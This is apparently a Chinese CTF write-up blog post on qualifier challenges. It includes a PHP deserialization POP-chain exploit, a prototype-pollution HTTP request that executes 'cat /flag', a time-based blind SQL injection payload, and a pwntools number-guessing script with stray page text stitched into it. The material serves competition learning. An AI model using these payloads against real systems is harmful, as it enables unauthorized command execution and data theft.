之前团队参加了第五届“强网”拟态防御国际精英挑战赛初赛,又是收获满满的一次,和全国很多大佬们一块同台竞争,最重要的是,通过比赛我们学到了很多新的方法和技能,下面让我们一块看看Web,Misc中比较不错的几个题。
一、Web
题目:ezus
通过/index.php/tm.php//%a1?source=可以直接获取源码,打一下就可以获得flag。
<?php
class UserAccount
{
protected $username;
protected $password;
public function __construct($username, $password)
{
$this->username = $username;
$this->password = $password;
// $this->password = new order("suanve://localhost@prankhub/../../../../../../../Users/su/Downloads/fastify/flag","file://try/pass//php:");
}
}
function object_sleep($str)
{
$ob = str_replace(chr(0) . '*' . chr(0), '@0@0@0@', $str);
return $ob;
}
function object_weakup($ob)
{
$r = str_replace('@0@0@0@', chr(0) . '*' . chr(0), $ob);
return $r;
}
class order
{
public $f;
public $hint;
public function __construct($hint, $f)
{
$this->f = $f;
$this->hint = $hint;
}
public function __wakeup()
{
//something in hint.php
// if ($this->hint != "pass" || $this->f != "pass") {
// $this->hint = "pass";
// $this->f = "pass";
// }
}
public function __destruct()
{
if (filter_var($this->hint, FILTER_VALIDATE_URL)) {
$r = parse_url($this->hint);
if (!empty($this->f)) {
if (strpos($this->f, "try") !== false && strpos($this->f, "pass") !== false) {
@include($this->f . '.php');
} else {
die("try again!");
}
if (preg_match('/prankhub$/', $r['host'])) {
@$out = file_get_contents($this->hint);
echo "<br/>" . $out;
} else {
die("<br/>error");
}
} else {
die("try it!");
}
} else {
echo "Invalid URL";
}
}
}
// @$username = $_POST['username'];
// @$password = $_POST['password'];
$username = "@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@";
$password = '";s:11:"%00*%00password";O:5:"order":2:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:80:"suanve://localhost@prankhub/../../../../../../../Users/su/Downloads/fastify/flag";}';
$password = urldecode($password);
// unserialize($password);
$a = new UserAccount($username, $password);
$user = serialize($a);
echo $user;
echo "pop:".object_weakup(object_sleep($user));
unserialize(object_weakup(object_sleep($user)));
最后在Burp里面一跑就得到了flag。
题目:WHOYOUARE
这道题目难度系数不高,Burp抓包之后,直接污染参数,再通过执行任意命可以直接getflag。
POST /user HTTP/1.1
Host: xxxxxxxxx:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 121
{"user":["{\"constructor\":{\"prototype\":{\"2\":\"cat /flag\"}},\"username\":\"admin\",\"command\":[\"-c\",\"-i\"]}"]
}
题目:popsql
通过题目名我们应该就知道,这道题目的突破口是sql注入,直接benchmark注入,果然......
sys.schema_table_statistics
sys.x$statement_analysis Fl49ish3re.f1aG123
'password' : f"a'or/**/if((select/**/strcmp(ord(right((select(group_concat(f1aG123))from(Fl49ish3re)),{i})),{s})),1,benchmark(7000000,sha(1)))/**/or'a"
二、Misc
题目:Welcome
这道题是本次比赛的签到题,打开txt就能看到flag了 不再多说
题目:babymisc
又是一道数迷题,猜数字
from pwn import *标签:username,Web,guess,..,hint,Misc,初赛,low,password From: https://blog.51cto.com/u_15945480/6038289
# context.log_level = 'debug'
while True:
io = remote("172.51.243.74",9999)
io.recvline()
io.recvline()
io.recvline()
io.sendline("Y")
#
low = 0
up = 999999
# guess = 454346
for i in range(15):
guess = round((int(up)+int(low))/2)
s = ""
try:
s = io.recvuntil(b"Please enter a number:")
except:
io.interactive()
print(b"[+]"+s)
if b"Please e" not in s:
print(s)
break
# s = io.recvuntil(b"Please enter a number:")\
print(f"[*] GET {s}")
if "low" in str(s):
low = guess
guess = int ((up - low) / 2) + low
# print(low)
elif "up" in str(s):
up = guess
guess = int ((up - low) / 2) + low
# print(up)
else:
guess = int ((up - low) / 2) + low
guess = int(guess)
print(f"[*] SEND {guess}")
io.sendline(f"{guess}")
if "lost" in str(s):
break
elif "flag" in str(s):
print("flag!!!!!")
break